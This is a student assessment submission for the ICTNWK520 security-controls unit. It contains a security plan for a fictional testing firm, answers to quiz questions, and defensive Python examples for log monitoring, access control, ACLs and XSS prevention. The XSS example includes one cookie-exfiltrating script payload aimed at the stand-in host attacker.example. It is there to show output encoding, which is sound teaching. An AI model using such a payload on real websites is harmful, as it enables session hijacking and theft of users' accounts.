Student Assessment Tasks 520 Final


Student Assessment Tasks

ICTNWK520 - Design ICT system security controls


Assessment task 1: Project Design

SCENARIO:

A leading software testing firm, TestSoft, has approached your team to develop a security plan for them. They have submitted their organizational information policy and requirements. The analyst highlighted the following points:

- All equipment must be kept well protected from unauthorized physical access.
- A powerful spam filter must be used to filter out spam on the company's email system.
- All users within the domain must use the same copy of anti-virus, managed through the anti-virus server.
- Sensitive information must be stored in a file, and the file must be protected from unauthorized access.
- Proper filtering applications must be used to protect against malware coming from the internet.
- All employees are subject to moderate password policies.
- Some employees often need to access the organization's network remotely; the communication taking place in that scenario must be strictly private.
- The wired and wireless LANs must be secured appropriately.
- All computers and servers must be updated regularly. Updates must be kept in a testing phase for a 14-day period and then applied to the servers.
- Appropriate hardening measures must be taken for the SQL server along with the other servers.
- The web server architecture must be designed to protect it from outside hackers.
- A general policy regarding account disabling and deletion.
Part A

Interacting with the client to collate the information required to prepare the project brief:

Client: Mohan
I hope you're well.

The team has developed a series of questions in order to have clarity on the client's requirements for the development of the project.

1. What objectives does the company have for the design, implementation and updating of its IT systems?

2. How do the IT infrastructure components work, and what challenges does the company face in enterprise IT asset management?

3. What are the business needs and priorities of the company regarding the design and implementation of authentication solutions?

4. What expectations and benefits does the company have for the new implementation of the system?

5. What encryption tools and other software tools does the company currently use?

6. Does the company require a high security standard for access management and information control?

7. What control tools, periodic updates and testing phases are in place for systems and security?

8. What security controls does the company currently use, and have any of those controls failed?

9. Will the company need the development of security policies and internal controls for account creation and deletion?

10. As a company, do you have any particular requirements for implementation, design, management or security that you want to add to the project?
Design ICT System Security Controls

ICTNWK520
Project Design

Ultimate Institute of Australia


International College

Tutor: Mohan Ganavarapu


Prepared By: Jair Miranda Gomez
ID: GT07108

Executive Summary:
This document is provided as an annex to a security plan that aims to reduce the security risks the company may face.

It is the document we will deliver to our client on first contact with the company in order to establish the requirements:

Table of Contents:
- Introduction
- Permission letter from IT Manager
- Letter seeking permission
- Security Plan
- Discussions
  - Identification of security constraints from the business requirements
  - Identification of the information and hardware security threats to the organization
  - Description of the defence-in-depth model
  - Description of the security threats to the business in detail, with a short description of the mitigation strategy
  - Risk assessment based on the threats identified
  - Threat mitigation strategies
  - Development of strategies/controls to mitigate the threats
  - Monitoring measures to alert a security breach
  - Implementation of a security policy
  - Application of proper spam, anti-virus, firewall, IDS and data encryption software
  - Detail of the wired and wireless security measures
  - Details of the policy that has to be applied to employees
  - Authentication and authorization measures that are necessary
  - Standard procedure to conduct security tests
  - Recommendation / suggestion
  - References
Introduction:

This project is drafted to comply with the company's conditions. It gathers evidence to demonstrate consistent performance under varying network industry conditions, and it covers the specifications that guarantee the security of the ICT systems: the probability, frequency and severity of direct and indirect damage, the proper use of ICT risk analysis tools and methodologies, and the management of the existing organizational security policies, so that the organization can grow and manage its technological resources well in an ICT environment with fewer security risks.

The documents presented below collect all the data, characteristics, studies and research obtained from the calculations and from the interviews conducted with the company (developed in the corresponding annexes). They set out the guidelines for carrying out the work: the installation of security systems, training, and the management of the resources projected for the realization of the project.

Permission letter from IT Manager to perform the required tests.

From: [email protected]

To: [email protected]

Subject: Permission letter to test the organization's IT network

As you requested permission to access the organization's network to test and prepare a security plan, I am happy to approve and to assist you with any further help required from my end.

Regards

Mohan Ganavarapu.

Letter seeking permission to obtain the logs

| Purpose of Permission | Date of Request | Person Requesting | Approving Authority |
| Organization network access permission to test and prepare a security plan | 15/08/2022 | Jair Miranda | Mohan Ganavarapu |

Security Plan

Discussions:

1. Identification of security constraints from the business requirements
2. Identification of the information and hardware security threats to the organization
3. Description of the defence-in-depth model
4. Description of the security threats to the business in detail, with a short description of the mitigation strategy.
5. Risk assessment based on the threats identified.

| Identified Risk | Risk Level | Risk Severity (Insignificant, Moderate, Catastrophic) | Risk Mitigation | Person Responsible |
| Highly sensitive information and documents stored on the different computer devices; maintain access codes and permissions for authorized personnel | High | Moderate | High | IT Manager |
| Company personnel, network connection services, servers and other computer tools that allow the proper functioning of the company | High | Moderate | High | IT Manager |
| Identify different risks and vulnerabilities: viruses, malware, and software and hardware failures that have already occurred, and also those that may occur more easily in the future | Medium | Insignificant | Medium | IT Manager |
| Guarantee that the company will be able to remain operational and functional during a security event | Medium | Insignificant | Medium | IT Security |
| The personnel of the company's IT area must be kept in constant training, so that they can provide the best response and effectiveness in the event of any mishap in this area | Low | Insignificant | Low | HR Manager |

6. Threat mitigation strategies

| Identified Risk | Risk Level | Person Responsible | When |
| Highly sensitive information and documents stored on the different computer devices; maintain access codes and permissions for authorized personnel | High | Jair Miranda | 2/08/2022 |
| Company personnel, network connection services, servers and other computer tools that allow the proper functioning of the company | High | Juan Saldarriaga | 15/08/2022 |
| Identify different risks and vulnerabilities: viruses, malware, and software and hardware failures that have already occurred, and also those that may occur more easily in the future | Medium | Juan Saldarriaga | 15/08/2022 |
| Guarantee that the company will be able to remain operational and functional during a security event | Medium | Jair Miranda | 30/08/2022 |
| The personnel of the company's IT area must be kept in constant training, so that they can provide the best response and effectiveness in the event of any mishap in this area | Low | Nestor Vincent | 15/09/2022 |

7. Development of strategies/controls to mitigate/avoid the threats

| Risk Type | Strategies / Controls to mitigate / avoid the threats |
| Security on company devices with confidential information and documents | Plan for incoming devices and how you will protect them. Use encrypted and authenticated connections when possible. Plan to rotate access passwords, access keys and authentication credentials. Keep track of the devices used. |
| Security in the network connection services, servers and other computer tools | Create a digital security policy. Monitor network data traffic. Use a good virtual private network (VPN). Use secure Wi-Fi. Install anti-virus/anti-malware software. |
| Management of risks and vulnerabilities: viruses, malware, and software and hardware failures | Keep your anti-virus software up to date. Run regularly scheduled scans with your anti-virus software. Keep your operating system up to date. Protect your network. |
| Functionality: the company can continue to operate during any security event | Back up to cloud storage, which protects against damage to the computer. If the user loses the media the data was stored on, they can still access it remotely and quickly and easily restore it. |
| Training for personnel in charge of information management and security | Permanent training on information security risks for company personnel and documents. |

8. Monitoring measures to alert a security breach

Security Measures:

- Specific clean desk policies: screen lock, user access and passwords, etc.
- Physical controls such as intrusion detection, video surveillance, and control and registration of access to certain areas.
- Controls and procedures against environmental damage or natural disasters.
- User notifications: presence of files with unusual characters, receipt of emails with suspicious attachments, strange behaviour of devices, inability to access certain services, loss/theft of storage devices or equipment holding information.
- Alerts generated by anti-virus software.
- Excessive and sudden consumption of memory or disk on servers and equipment.
- Network traffic anomalies or traffic spikes at unusual hours.
- Alerts from intrusion detection/prevention systems (IDS/IPS).
- Alerts from event correlation systems (SIEM).
- Analysis of logs of connections made through corporate proxies or connections blocked on firewalls.
- Log analysis of servers and applications for failed or unauthorized access attempts.
- Log analysis in Data Loss Prevention (DLP) tools.
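As an added example (not part of the original plan), the "log analysis for failed access attempts" measure above can be automated rather than read by eye. The Python script below parses constructed sshd-style auth log lines, keeps a sliding time window of failed logins per source IP, and raises an alert when the count inside the window reaches a threshold. The host name, IP addresses, log format and thresholds are illustrative assumptions; the detection logic is what the measure describes.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in sshd/auth.log style; these are not real logs.
SAMPLE_LOG = """\
2022-08-15T09:00:01 srv01 sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
2022-08-15T09:00:03 srv01 sshd[1201]: Failed password for root from 203.0.113.7 port 51023 ssh2
2022-08-15T09:00:04 srv01 sshd[1201]: Failed password for root from 203.0.113.7 port 51024 ssh2
2022-08-15T09:00:06 srv01 sshd[1201]: Failed password for root from 203.0.113.7 port 51025 ssh2
2022-08-15T09:00:08 srv01 sshd[1201]: Failed password for root from 203.0.113.7 port 51026 ssh2
2022-08-15T09:00:09 srv01 sshd[1202]: Accepted publickey for jair from 192.0.2.10 port 40110 ssh2
2022-08-15T09:10:00 srv01 sshd[1203]: Failed password for jair from 192.0.2.10 port 40111 ssh2
2022-08-15T09:40:00 srv01 sshd[1204]: Failed password for jair from 192.0.2.10 port 40112 ssh2
"""

# One regex for the assumed line format: ISO timestamp, host, sshd[pid], result, method, user, source IP.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\S+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_line(line):
    """Return a dict of fields for a recognised line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.fromisoformat(event["ts"])
    return event


def detect_failed_login_bursts(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: peak_count} for sources with >= threshold failures
    inside any window of window_seconds. Successful logins are ignored."""
    recent = defaultdict(deque)   # per-IP timestamps of failures still inside the window
    alerts = {}
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None or event["result"] != "Failed":
            continue
        window = recent[event["ip"]]
        window.append(event["ts"])
        # Drop failures that fell out of the window relative to the newest event
        while (event["ts"] - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            alerts[event["ip"]] = max(alerts.get(event["ip"], 0), len(window))
    return alerts


if __name__ == "__main__":
    for ip, count in detect_failed_login_bursts(SAMPLE_LOG).items():
        print(f"ALERT possible brute force: {count} failed logins from {ip} within 60s")
```

With the defaults, only 203.0.113.7 (five failures in seven seconds) is reported; the two failures from 192.0.2.10 are thirty minutes apart and stay below the threshold, which is the point of the window: a user mistyping a password twice in a morning should not page anyone.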

9. Implementation of a security policy

- Keep every current security policy updated and known to the entire company.
- Track the communications made to stakeholders in cases of a data security breach.
- Carry out random reviews of the content of the notifications sent to affected stakeholders.
- Keep proof of the entire procedure in case, in the future, an affected party decides to sue the company.
10. Application of proper spam, anti-virus, firewall, IDS and data encryption software.

| Application type | Uses | Examples |
| Spam | Anti-spam techniques are solutions that allow users to prevent or block the delivery of spam (unwanted mail). They automatically scan all incoming emails sent to a mailbox for this purpose. | GravityZone Security (Bitdefender), EuropeanMX, Exclaimer Anti-Spam, GFI MailEssentials, MX GuardDog |
| Anti-virus | Software used to prevent, search for, detect, and remove viruses from a computer. Once installed, most anti-virus software runs automatically in the background to provide real-time protection against virus attacks. | Kaspersky (recommended by Incuatro), ESET (recommended by Incuatro), Norton, AVG, PC Tools, Bitdefender, Avast, McAfee |
| Firewall | A system whose function is to protect our private network from intrusions or attacks from other networks by blocking access to it. It controls the incoming and outgoing traffic between networks or between computers on the same network. | SolarWinds Network Firewall Security Management, ZoneAlarm, Comodo Firewall, TinyWall, NetDefender, GlassWire, PeerBlock, AVS Firewall |
| IDS | Intrusion detection system: an application used to detect unauthorized access to a computer or a network. These systems monitor incoming traffic and compare it with an updated database of known attack signatures. | Snort, Security Onion, OpenWIPS-NG, Suricata, Bro IDS (now Zeek), OSSEC, Open Source Tripwire, AIDE |
| Data encryption | Encryption is one of the most popular and effective data security methods used by organizations. There are two main types of data encryption: asymmetric encryption, also known as public key encryption, and symmetric encryption, which uses a single shared key. | BitLocker, VeraCrypt, FileVault 2, DiskCryptor; LastPass (a password manager: it encrypts its credential vault rather than files or disks) |
11. Detail of the wired and wireless security measures

We will make available three solutions to protect wireless LAN encryption and authentication: Wi-Fi Protected Access (WPA), Wi-Fi Protected Access 2 (WPA2), and a Virtual Private Network (VPN) connection.

WPA and WPA2: these Wi-Fi Alliance standards-based certifications, for both large and growing enterprise LANs and small or home offices, provide mutual authentication of individual users (in Enterprise mode, through 802.1X/EAP) and strong encryption. WPA with TKIP is deprecated; WPA2 with AES-CCMP, or WPA3 where the hardware supports it, should be used.
VPN: provides effective security for users who access the network wirelessly while travelling or away from their offices.

Where the computers connected to the network use secure protocols such as HTTPS or SSH, the exposure of the network is lower. It still has to be protected, because many insecure protocols remain in use, such as HTTP or DNS. A machine offering TCP/IP services has to open certain ports, to which trusted or untrusted computers can connect, so only the ports that are actually needed should be exposed.
VLANs improve both security and performance: if there is an attack on one VLAN, the other VLANs are not affected, unless the attack generates excess traffic.

12. Details of the policy that has to be applied to employees

Behaviours that must always be avoided: practices that can put systems and information at risk, such as opening suspicious files or links, sharing passwords, or using open Wi-Fi networks.
Practices that must always be followed to maintain a correct level of protection and security, for example:
- Encrypt sensitive files
- Implement backups
- Use passwords and renew them regularly
- Use a VPN
- Install anti-virus and anti-malware software
The policy protects:
- Information privacy, against access by unauthorized persons such as hackers.
- Data integrity, against corruption due to media failure or deletion.
- Availability of services, against internal or external technical failures.

13. Authentication and authorization measures that are necessary

By controlling the access privileges granted to users we can ensure the confidentiality and availability of information; in addition, access control lets us:
- Ensure that only authorized persons may access certain resources (systems, equipment, programs, applications, databases, networks, etc.) as required by their work functions.
- Identify and audit the accesses made, and apply internal security controls.
- Document the access procedures for the different applications that process personal data.
In short, control access at every level: network, systems and applications.
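The two requirements above (access granted according to work function, and every access identifiable and auditable) are what role-based access control delivers. The following Python is an added example, not code from the original plan or from TestSoft: the roles, users and resource names are hypothetical. Permissions hang off roles, users are assigned roles, the check is deny-by-default, and every decision, allowed or denied, is written to an audit log that can be queried afterwards.

```python
from datetime import datetime, timezone

# Hypothetical role model: role -> set of (action, resource) permissions
ROLE_PERMISSIONS = {
    "it_manager": {("read", "hr_records"), ("write", "hr_records"), ("read", "audit_log")},
    "tester":     {("read", "test_plans"), ("write", "test_results")},
    "hr":         {("read", "hr_records")},
}

# Hypothetical user -> roles assignment (a user may hold several roles)
USER_ROLES = {
    "mohan": {"it_manager"},
    "jair":  {"tester"},
    "ana":   {"hr", "tester"},
}


class AccessControl:
    def __init__(self, role_permissions, user_roles):
        self.role_permissions = role_permissions
        self.user_roles = user_roles
        self.audit_log = []   # every decision is recorded for later review

    def permissions_for(self, user):
        """Union of the permissions of all roles held by the user (empty for unknown users)."""
        perms = set()
        for role in self.user_roles.get(user, ()):
            perms |= self.role_permissions.get(role, set())
        return perms

    def authorize(self, user, action, resource):
        """Deny by default: access is granted only if some role of the user carries it."""
        allowed = (action, resource) in self.permissions_for(user)
        self.audit_log.append({
            "time": datetime.now(timezone.utc).isoformat(),
            "user": user,
            "action": action,
            "resource": resource,
            "decision": "ALLOW" if allowed else "DENY",
        })
        return allowed

    def denied_attempts(self, user=None):
        """Audit query: denied decisions, optionally for one user."""
        return [e for e in self.audit_log
                if e["decision"] == "DENY" and (user is None or e["user"] == user)]


if __name__ == "__main__":
    ac = AccessControl(ROLE_PERMISSIONS, USER_ROLES)
    ac.authorize("jair", "write", "test_results")   # tester doing tester work: allowed
    ac.authorize("jair", "read", "hr_records")      # tester reaching into HR data: denied
    ac.authorize("ghost", "read", "test_plans")     # unknown account: denied
    for entry in ac.audit_log:
        print(entry)
```

Because the decision and the log entry are produced by the same call, the audit trail cannot drift from what was actually enforced; reviewing `denied_attempts()` is then the "identify and audit the accesses made" step of the plan.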

14. Standard procedure to conduct security tests

The activities in the security testing phase are the following:
1. Run the tests. The chosen tests are executed with the tools selected and configured according to the characterization of the applications in question. While the tests are running, the tools report the vulnerabilities found along the way.
2. Register vulnerabilities. Once the test execution is finished, the reports with the vulnerabilities detected in the applications are generated. These vulnerabilities are saved for later analysis and to evaluate, with the development team, their impact on the system.
3. Evaluate report results. The tester writes a description of the vulnerabilities detected to discuss with the programmers or the system development team. The impact, the type of vulnerability and a possible remediation recommendation are analysed.
15. Recommendation / suggestion

Systems that carry only the minimum necessary to perform their tasks are less likely to fall victim to an attack, so applications and other programs should be installed only when necessary. The plan should identify the systems in scope together with the operational, technical and security management controls, as well as the company's human resource requirements: the personnel required, the skills required, and the personnel available to carry out business security practices.
Make use of controls such as anti-virus and anti-malware software; different types of firewall; intrusion detection and prevention systems; allow lists and block lists (whitelisting and blacklisting); and update management software. Tests must then be carried out on the systems and controls to verify that they are still effective; these can be penetration tests or vulnerability scans of the systems, so that the risk can be corrected appropriately.
Finally, the plan should cover risk assessment and management; an inventory of assets and applications; the actions to be taken in the event of an incident; time objectives such as RTO (recovery time objective) and RPO (recovery point objective); the maximum periods for maintaining continuity in the event of a failure, such as WRT (work recovery time), MTD (maximum tolerable downtime) and MTPD (maximum tolerable period of disruption); and countermeasures to the different threats.

16. References:

Nestler, V., White, G., Conklin, W. A., Hirsch, M., & Schou, C. Principles of Computer Security: CompTIA Security+ and Beyond Lab Manual, Second Edition (CompTIA Authorized).
ICTNWK520 Design ICT system security and controls

Answer the following questions

Section 1
1 Which of the following is a set of voluntary standards governing encryption?
B PKCS
Public Key Cryptography Standards is a set of voluntary standards for public
key cryptography. This set of standards is coordinated by RSA.

2 Which protocol is used to create a secure environment in a wireless network?
B Wired Equivalent Privacy (WEP) was designed to provide security equivalent to that of a wired network. WEP has well-known cryptographic weaknesses and isn't considered secure; WPA2 or WPA3 should be used instead.

3 An Internet server interfaces with TCP/IP at which layer of the DOD model?
C The Process (Application) layer interfaces with applications and encapsulates traffic through the Host-to-Host (Transport) layer, the Internet layer, and the Network Access layer.

4 You want to establish a network connection between two LANs using the Internet.
Which technology would best accomplish that for you?
B L2TP (Layer 2 Tunneling Protocol) is a tunneling protocol that can be used between LANs. L2TP provides no encryption of its own, so it should be combined with IPsec (L2TP/IPsec) to protect the data.

5 Which design concept limits access to systems from outside users while protecting
users and systems inside the LAN?
A DMZ (demilitarized zone) is an area in a network that allows restrictive access
to untrusted users and isolates the internal network from access by external
users and systems. It does so by using routers and firewalls to limit access to
sensitive network resources.

6 Which kind of attack is designed to overload a particular protocol or service?
D A flood attack is designed to overload a protocol or service by repeatedly initiating requests for service. This type of attack usually results in a DoS (denial of service) situation, because the protocol freezes or excessive bandwidth is consumed by the requests.

7 What is the process of making an operating system secure from attack called?
A Hardening

8 The integrity objective addresses which characteristic of information security?
A Verification that information is accurate
To meet the goal of integrity, you must verify that the information being used is accurate and hasn't been tampered with. Integrity is coupled with accountability to ensure that data is accurate and that a final authority exists to verify this, if needed.

9 The confidentiality objective addresses which characteristic of information security?
A Verification that data is kept private and secure

10 Which mechanism or process is used to enable or disable access to a network resource based on an IP address?
B ACL: Access control lists (ACLs) are used to allow or deny an IP address access to a network. ACL mechanisms are implemented in many routers, firewalls, and other network devices.
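An ACL is evaluated top-down, first match wins, with an implicit deny at the end, and its two classic failure modes are a rule that is shadowed by an earlier, broader one and a forgotten implicit deny. The Python below is an added example, not part of the original answer or of any vendor's implementation: it evaluates a constructed rule set with the standard-library ipaddress module and reports shadowed rules. The networks and actions are illustrative assumptions.

```python
import ipaddress

# Constructed rule set: evaluated top-down, first match wins, implicit deny after the last rule
ACL = [
    ("deny",   "203.0.113.0/24"),    # range seen attacking us
    ("permit", "192.0.2.0/24"),      # office LAN
    ("permit", "198.51.100.5/32"),   # a single remote administrator host
]

# A misordered variant: the broad permit at the top makes the deny unreachable
MISORDERED = [
    ("permit", "0.0.0.0/0"),
    ("deny",   "203.0.113.0/24"),
]


def compile_acl(rules):
    """Parse the textual rules once; reject unknown actions and malformed networks."""
    compiled = []
    for action, network in rules:
        if action not in ("permit", "deny"):
            raise ValueError(f"unknown ACL action {action!r}")
        compiled.append((action, ipaddress.ip_network(network, strict=True)))
    return compiled


def evaluate(compiled, source_ip):
    """Return 'permit' or 'deny' for a source address; no match means deny."""
    addr = ipaddress.ip_address(source_ip)
    for action, network in compiled:
        # An IPv6 source can never match an IPv4 rule and vice versa
        if addr.version == network.version and addr in network:
            return action
    return "deny"   # the implicit deny at the end of every ACL


def shadowed_rules(compiled):
    """Indexes of rules that can never match because an earlier rule covers their whole network."""
    shadowed = []
    for i, (_, network) in enumerate(compiled):
        for _, earlier in compiled[:i]:
            if earlier.version == network.version and network.subnet_of(earlier):
                shadowed.append(i)
                break
    return shadowed


if __name__ == "__main__":
    acl = compile_acl(ACL)
    for ip in ("192.0.2.33", "203.0.113.9", "198.51.100.5", "198.51.100.6", "2001:db8::1"):
        print(f"{ip:>16} -> {evaluate(acl, ip)}")
    print("shadowed rules in MISORDERED:", shadowed_rules(compile_acl(MISORDERED)))
```

Running `shadowed_rules` against a rule set before deployment catches the ordering mistake that a manual read-through often misses: in the misordered list the deny is reported as unreachable, and 203.0.113.9 is permitted.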

11 Which of the following would provide additional security to an Internet web server?
C Changing the default port for traffic to 443 (the standard HTTPS port; the added security comes from serving the site over TLS, not from the port number itself)

12 An individual presents herself at your office claiming to be a service technician. She wants to discuss your current server configuration. This may be an example of what type of attack?
A Social engineering is using human interaction to gain access to, or information about, your organization.
13 What encryption process uses one message to hide another?
A Steganography is the process of hiding one message inside another, for example inside an image file; digital watermarking is one application of the technique.

14 Which policy dictates how computers are used in an organization?
C Use policy (acceptable use policy)

15 You want to grant access to network resources based on authenticating an individual's retina during a scan. Which security method uses a physical characteristic as a method of determining identity?
C Biometrics is the authentication process that uses physical characteristics, such as a palm print or retinal pattern, to establish identification.

16 The process of verifying the steps taken to maintain the integrity of evidence is called
what?
B Chain of custody ensures that each step taken with evidence is documented
and accounted for from the point of collection. Chain of custody is the Who,
What, When, Where, and Why of evidence storage

17 Which system would you install to provide active protection and notification of security
problems in a network connected to the Internet?
A IPS intrusion prevention system (IPS) provides active monitoring and rule-based
responses to unusual activities on a network. A firewall, for example, provides
passive security by preventing access from unauthorized traffic. If the firewall
were compromised, the IPS would notify you based on rules that it’s designed to
implement

18 What type of program exists primarily to propagate and spread itself to other
systems?
D Worm is designed to multiply and propagate. Worms may carry viruses that
cause system destruction, but that isn’t their primary mission

19 Which of the following is a major security problem with FTP servers?
C User IDs and passwords are unencrypted.

20 Which access control method is primarily concerned with the role that individuals have
in the organization?
C RBAC Role-based access control (RBAC) is primarily concerned with providing
access to systems that a user needs based on the user’s role in the
organization

Section 2

1 What is the difference between a security policy and a security plan?

A security policy identifies the rules that will be followed to maintain security in a system, while a security plan details how those rules will be implemented. A security policy is generally included within a security plan. A security policy might be as simple as a statement from the highest-level management that all accounts on a system must be protected by the use of a password; the security plan then specifies how that rule is put into practice.

2 What is an IDS and an IPS?

An intrusion detection system (IDS) monitors traffic on your network, analyses that traffic for signatures matching known attacks, and alerts you when something suspicious happens. In the meantime, the traffic keeps flowing. An intrusion prevention system (IPS) also monitors traffic, but it sits inline and can block or drop the malicious traffic rather than only alerting.

3 Differentiate between IDS and Firewall

A firewall is a device and/or software that stands between a local network and the Internet and filters traffic that might be harmful.
An Intrusion Detection System (IDS) is software or a hardware device installed on the network (NIDS) or on a host (HIDS) to detect and report intrusion attempts against the network.

4 What do you mean by server hardening?

Server hardening is a general system hardening process that involves securing the data, ports, components, functions, and permissions of a server using advanced security measures at the hardware, firmware, and software layers.

5 Give one example of three-factor authentication

Example: a password (knowledge factor), plus a hardware OTP token or smart card (possession factor), plus a fingerprint scan (inherence factor).
Possession factors are things the user has. This category includes one-time password tokens (OTP tokens), key fobs, smartphones with OTP apps, employee ID cards and SIM cards.
Inherence factors include any biological traits of the user that are confirmed at login. This category includes the range of biometrics such as retina scans, iris scans, fingerprint scans, finger vein scans, facial recognition, voice recognition, hand geometry and even earlobe geometry.

Section 3

1 What is the relation between security, usability and cost?

Historically, more often than not, effective security came at the expense of usability, and usability came at the expense of security. Many continue to believe that there is no way to achieve both effective security and usability simultaneously; it just does not work. Cost is the third constraint: stronger controls generally cost more to implement and operate, so a security plan has to balance the three.

2 What is confidentiality, integrity and availability in security?

In this context, confidentiality is a set of rules that limits access to information, integrity is the assurance that the information is trustworthy and accurate, and availability is a guarantee of reliable access to the information by authorized people.

3 Write a short note on the defence-in-depth model.

Defence in depth is a strategy that leverages multiple security measures to protect an organization's assets. The thinking is that if one line of defence is compromised, additional layers exist as a backup to ensure that threats are stopped along the way.

4 What is a DMZ? How do you implement a DMZ?

A DMZ network is a perimeter network that protects, and adds an extra layer of security to, an organization's internal local-area network against untrusted traffic. A common DMZ is a subnetwork that sits between the public internet and the private network.

Public-facing servers and resources are placed in the DMZ, isolated and given only limited access to the LAN, so that they can be reached from the internet while the internal LAN cannot. As a result, a DMZ makes it more difficult for a hacker to gain direct access to an organization's data and internal servers via the internet.

5 What is a denial of service attack? Give 2 examples

A denial of service (DoS) attack makes a system or service unavailable to its legitimate users. There are two general methods: flooding services or crashing services. Flood attacks occur when the system receives more traffic than the server can buffer, causing it to slow down and eventually stop. Two examples:
- SYN flood: the attacker sends a stream of TCP connection requests and never completes the handshake, exhausting the server's connection table.
- Buffer overflow attack: a crash-type DoS, in which malformed input larger than the program expects crashes the service.

6 Explain the term VPN

A VPN, or virtual private network, is a technology that establishes a secure tunnel between two or more devices.
An Internet VPN service, such as Mullvad, offers a tunnel between you and the Internet, allowing you to browse the web securely and privately, even when using a public Wi-Fi network at a cafe or hotel.
7 Explain the following in brief and give a mitigation strategy

Virus

- Installing the appropriate anti-virus application is necessary but certainly not sufficient to keep malicious code at bay.
- Deploying appropriate intrusion detection and prevention systems is also effective in warding off such dangers. One example is the Cisco Security Agent (CSA).

Worm

- Containment: compartmentalize the network into infected and non-infected parts. This helps to contain the spread of the worm.
- Inoculation: scan and patch the vulnerable systems.
- Quarantine: detect, disconnect and remove the infected machines. If removal is not possible, the infected machines are blocked.

Rootkits

- Scanners are effective against rootkit attacks: they analyse the entire system to detect rootkits, and are most effective against application-level rootkits.
- For complete protection against more sophisticated rootkits such as bootkits or firmware rootkits, back up all your data, wipe the system and reinstall it.

XSS

- Whenever possible, prohibit HTML code in inputs. Preventing users from posting HTML code into form inputs is a straightforward and effective measure.
- Validate inputs. If you are going to accept form inputs, validating the data to ensure it meets specific criteria helps.
- Encode output. Escape untrusted data before inserting it into a page, so that the browser renders it as text rather than as markup.
- Secure your cookies. Setting rules for how your web applications handle cookies can limit XSS: the HttpOnly flag blocks JavaScript from reading the session cookie.

MITM

- At a minimum, every enterprise application should be encrypted, including web, email and voice traffic, not just sensitive communications.
- The internet adage of "be liberal in what you accept" means many out-of-the-box web servers accept older protocols and weaker encryption or authentication algorithms; these should be disabled.
- Consider adding certificate pinning, which reduces the possibility that a fake digital certificate can be used by an MITM attacker to access your applications and web services.
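The XSS mitigations in question 7 are easiest to see side by side. The Python below is an added example, not code from the original answer: it renders a constructed attacker payload once by plain string concatenation (the vulnerable form) and once with contextual output encoding via the standard-library html module (the hardened form), adds an allow-list input validator, and builds a Set-Cookie header with the HttpOnly, Secure and SameSite attributes. The page template, the payload and the cookie name are illustrative assumptions.

```python
import html
import re

# Constructed attacker-controlled input: a typical reflected-XSS probe that exfiltrates cookies
PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(name):
    """Untrusted input concatenated straight into HTML: a browser would execute the script."""
    return "<p>Welcome, " + name + "</p>"


def render_hardened(name):
    """Contextual output encoding: <, >, &, " and ' become entities and display as text."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


def contains_live_script(markup):
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in markup.lower()


def validate_username(value):
    """Allow-list validation: letters, digits, '_', '.', '-', 1 to 32 characters. HTML never passes."""
    return re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", value) is not None


def session_cookie_header(token):
    """HttpOnly keeps document.cookie from exposing the session id even if a script does run;
    Secure restricts it to HTTPS; SameSite=Strict withholds it from cross-site requests."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Strict; Path=/"


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("hardened:  ", render_hardened(PAYLOAD))
    print("valid username?", validate_username(PAYLOAD))
    print(session_cookie_header("3f9a...example"))
```

Output encoding is the control that does the real work: even when a payload slips past validation, the escaped form reaches the browser as inert text, and the cookie flags limit what a script could steal if some other injection point were missed.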

8 What is one, two and three factor authentication?

One-factor authentication: "something a user knows." The most recognized one-factor authentication method is the password.
Two-factor authentication: in addition to the first factor, the second factor is "something a user has." Examples are a fob that generates a one-time code, a smart card, or a signed digital certificate held on a device. The most recognized form of two-factor authentication is the ubiquitous RSA SecurID fob.
Three-factor authentication: in addition to the previous two factors, the third factor is "something a user is." Examples of a third factor are all biometric, such as the user's voice, hand geometry, a fingerprint, a retina scan or similar. The third factor most often cited is the retina scan.
